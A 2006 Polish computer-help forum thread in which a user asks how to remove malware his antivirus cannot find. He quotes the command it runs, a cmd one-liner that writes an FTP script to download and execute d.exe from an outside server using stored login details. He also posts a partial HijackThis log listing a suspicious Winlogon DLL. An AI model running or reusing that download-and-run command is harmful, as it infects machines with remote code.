CentrumXP Forum Tematyka portalu CentrumXP.pl Bezpieczeństwo Dziwny wirus/trojan i problem z jego usunięciem.

Dziwny wirus/trojan i problem z jego usunięciem.

Nie wiem co to jest czy trojan czy wirus czy jakiś inny dziwny program szpiegujący, ale wogóle nie jestem wstanie tego usunąć mój antywir to Panda Titanium 2006. Teraz coś o wirusie: co jakiś czas włącza on menadżer urządzeń skąd otwiera linnie komend w której wpisuje coś takiego: "/c echo open ftp.volja.net 21 >> ik &echo user uros777 bleh777 >> ik &echo binary >> ik &echo get d.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &d.exe &exit". Pobiera on ten plik i niby nic sie nie dzieje. W ogóle to nie wiem kto jest tego autorem bo usunąłem ten plik FTP. Ale problem w tym że ani Panda ani AdAware, ani Spyware Detector nic nie wykrywa co mogło by być alarmujące, więc może ktoś z użytkownikó ma pomysł jak rozwiązać ten problem, jakim programem łatką itp.

Odpowiedzi: 1

Loga HijackThis sobie sprawdź - szczegółów na temat HijackThis, jego logów i sprawdzania tychże logów szukaj w przyklejonych tematach w tym dziale.

Jak czegoś nie będziesz wiedział albo będziesz miał wątpliwości - pytaj.

 

Update:

Aj waj - to nie ten dział Bezpieczeństwo ...Przepraszam - mówiłem o Bezpeczeństwie z " Tematyka portalu CentrumXP.pl"

Żółty
Dodano
11.11.2006 00:32:13
  • jaro90 11.11.2006 01:13:43

    <P>Dzięki za zainteresowanie :P no wiec z loga tylko nei wiem co to może oznaczać :</P> <P>&nbsp;</P> <P>C:\WINDOWS\System32\smss.exe<BR>C:\WINDOWS\system32\csrss.exe<BR>C:\WINDOWS\system32\winlogon.exe<BR>C:\WINDOWS\system32\services.exe<BR>C:\WINDOWS\system32\lsass.exe<BR>C:\WINDOWS\system32\svchost.exe<BR>C:\WINDOWS\system32\svchost.exe<BR>C:\WINDOWS\system32\svchost.exe<BR>C:\WINDOWS\System32\svchost.exe<BR>C:\WINDOWS\System32\svchost.exe<BR>C:\WINDOWS\system32\LEXBCES.EXE<BR>C:\WINDOWS\system32\spoolsv.exe<BR>C:\WINDOWS\system32\LEXPPS.EXE<BR>C:\WINDOWS\System32\Ati2evxx.exe<BR>C:\WINDOWS\System32\svchost.exe<BR>C:\WINDOWS\system32\wdfmgr.exe<BR>C:\WINDOWS\System32\alg.exe<BR>C:\WINDOWS\system32\devldr32.exe<BR>C:\WINDOWS\system32\ctfmon.exe<BR>C:\WINDOWS\System32\svchost.exe<BR>C:\WINDOWS\system32\taskmgr.exe<BR>O17 - HKLM\System\CCS\Services\Tcpip\..\{C6F84176-CFB2-4EC9-8458-0C31CCDDD50C}: NameServer = 192.168.0.1<BR>O17 - HKLM\System\CCS\Services\Tcpip\..\{FE460B21-CBB4-459F-AADD-2D9E513769D0}: NameServer = 194.204.152.34 217.98.63.164<BR>O20 - Winlogon Notify: avldr - C:\WINDOWS\SYSTEM32\avldr.dll</P> <P>&nbsp;</P> <P>Jak przypuszczam ktoś wie któe są konieczne wiec droga selekcji sie wyeliminuje</P> <P>&nbsp;</P> <P>pozdrawiam Jarek</P>

  • De Niro 22.11.2006 01:23:18

    LOG jest ucięty, zrób jeszcze raz.&nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; <br>

jaro90
Dodano:
11.11.2006 00:21:13
Komentarzy:
1
Strona 1 / 1